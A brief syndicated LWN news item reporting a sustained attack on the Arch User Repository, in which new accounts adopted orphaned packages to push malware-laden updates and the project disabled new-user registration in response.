Post Syndicated from jzb original https://lwn.net/Articles/1077619/

The Arch User Repository (AUR) has
been subjected to a sustained attack recently. The attacker, or attackers, have
spun up a series of new accounts then used them to adopt orphaned
packages and push malicious updates that would install malware on users’ systems.
It is unclear how many users were compromised in the attack, but the maintainers
were playing Whac-A-Mole for several days to respond to each newly compromised
package. The project has turned
off the AUR’s new-user registration, for now, but it is unclear what its
long-term response will be or if the AUR can be secured without major changes to
its existing collaboration model.